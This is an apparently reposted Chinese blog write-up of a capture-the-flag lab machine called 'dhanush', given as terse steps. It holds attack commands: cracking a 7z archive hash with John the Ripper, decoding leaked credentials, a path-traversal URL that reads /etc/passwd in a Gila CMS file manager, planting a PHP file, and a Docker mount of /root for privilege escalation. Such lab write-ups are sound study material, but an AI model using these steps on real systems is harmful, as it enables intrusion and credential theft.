dhanush - 走看看

zoukankan html css js c++ java

dhanush

一、信息收集

ip、端口、指纹

目录扫描

查看frp文件

密码破解

失败换一个

https://github.com/truongkma/ctf-tools/blob/master/John/run/7z2john.py

python 7z2ctf.py arjun.7z > hash

john --wordlist=/usr/share/wordlists/rockyou.txt hash

john hash --show

解码

echo 'Z2lsYTphZG1pbkBnbWFpbC5jb206cHJpbmNlc2E=' | base64 -d

gila:admin@gmail.com:princesa

查找版本漏洞

http://192.168.152.132/gila/admin/fm/?f=src../../../../etc/passwd

修改文件

创建404php

发现docker

docker run -v /root:/mnt -it alpine

查看全文

相关阅读:
Java +安卓定时任务
 android动画解析（初级）
语义化版本 2.0.0
团队中的 Git 实践
 Spring和SpringBoot比较，解惑区别
 Spring boot 拦截器和过滤器
 [ERROR] Failed to execute goal org.apache.maven.plugins:maven-install-plugin:2.4:install (default-cli) on project kircp-js-plan-resource: The packaging for this project did not assign a file to the bu
Java函数优雅之道
 在springMVC的controller中获取request，response对象的一个方法
 Kotlin 数据类型(数值类型)

原文地址：https://www.cnblogs.com/bingtang123/p/13693160.html

Copyright © 2011-2022 走看看